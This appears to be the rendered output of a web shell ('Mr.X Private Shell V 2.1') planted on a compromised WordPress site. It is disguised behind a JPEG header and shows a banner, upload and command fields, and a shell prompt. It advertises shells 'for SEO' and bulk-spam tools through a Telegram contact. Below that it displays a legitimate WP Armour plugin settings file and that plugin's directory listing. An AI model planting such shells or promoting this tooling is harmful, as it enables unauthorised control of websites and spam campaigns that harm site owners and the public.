����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.249: ~ $
<?php 
if ( ! defined( 'ABSPATH' ) ) exit; 
if (isset($_POST['submit-wpa-general-settings'])){
    $saveReturn = wpa_save_settings();
}

if (isset($_POST['submit-wpae-general-settings'])){
    $saveReturn = wpae_save_settings();
}

if (isset($_POST['submit-wpae-whitelist_ips'])){
    $saveReturn = wpae_save_whitelist_ips();
}

if (isset($_POST['submit-wpae-integrations'])){
    $saveReturn = wpae_save_integrations();
}

if (isset($_GET['tab']) && array_key_exists($_GET['tab'],$wpa_tabs)){
  $currentTab = $_GET['tab'];
} else {
  $currentTab = 'settings';
}
?>

<?php if (isset($saveReturn)):?>
    <div class="updated <?php echo $saveReturn['status']; ?>" id="message"><p><?php echo $saveReturn['body']; ?></p></div>
  <?php endif; ?>
      
<div class="wrap">
    
    <h1>WP Armour - HoneyPot Anti Spam</h1>

    <nav class="nav-tab-wrapper">
        <?php foreach ($wpa_tabs as $tabKey => $tabData) { ?>
            <a href="<?php echo admin_url(); ?>admin.php?page=wp-armour&tab=<?php echo $tabKey; ?>" class="nav-tab <?php echo $currentTab == $tabKey?'nav-tab-active':''; ?>"><?php echo $tabData['name']; ?></a>
        <?php } ?>
    </nav>

    <div class="tab-content">
        <table width="100%">
            <tr>
                <td valign="top">
                <?php include($wpa_tabs[$currentTab]['path']); ?>
                </td>
                <td width="15">&nbsp;</td>
                <td width="250" valign="top"><?php include('wpa_sidebar.php'); ?></td>
            </tr>
        </table>
    </div>          
            
</div>

Filemanager

Name Type Size Permission Actions
wpa_extended_version.php File 2.24 KB 0644
wpa_main.php File 1.57 KB 0644
wpa_notice.php File 6.03 KB 0644
wpa_settings.php File 2.88 KB 0644
wpa_sidebar.php File 1.82 KB 0644
wpa_stats.php File 2.42 KB 0644
wpa_stats_widget.php File 1.39 KB 0644